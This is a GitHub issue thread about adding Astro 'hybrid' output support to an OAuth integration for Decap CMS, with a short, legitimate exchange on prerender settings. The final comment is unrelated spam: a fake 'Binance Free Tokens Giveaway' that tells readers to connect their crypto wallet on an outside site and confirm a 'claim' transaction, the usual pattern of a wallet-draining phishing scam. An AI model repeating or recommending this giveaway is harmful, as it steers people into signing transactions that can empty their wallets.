### ISSUE TITLE
Add support for astro hybrid output

### ISSUE THREAD

**Issue by OliverSpeir** [dorukgezici/astro-decap-cms-oauth#4]
I think what would need to be done is conditionally add `export const prerender = false;` to the `index.ts` and `callback.ts` files.

It might be possible to just always have that line there, and when the astro output is `server` I don't think that will cause a problem,  I'm not sure though.

**Comment by dorukgezici** [comment]
But that would defeat the purpose of this package, wouldn't it? The OAuth flow wouldn't work when the routes are prerendered.
If you are taking care of OAuth in some other way, I guess setting `integrations: [decapCmsOauth({ oauthDisabled: true })],` could achieve not depending on `output: server` as well.

**Comment by OliverSpeir** [comment]
If you have output hybrid and you export prerender = false Astro will make it SSR just like if you have output server and you export prerender = true 

It's basically just a nice way of having your actual Astro project pre rendered and only have the end points SSR 

I think if you export prerender = false when in server mode it won't cause a problem

I can test this when I get a chance and make a PR if it works 

Hybrid output is the same as Server it just basically makes the default to prerender unless you export the prerender variable as false whereas server defaults to SSR unless you export prerender = true

**Comment by dorukgezici** [comment]
I haven't used the `hybrid` option for `output` before, so I tested it and it worked fine even without adding the `export const prerender = false;` line. I guess Astro is smart enough to not try prerendering a TS route 😀

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
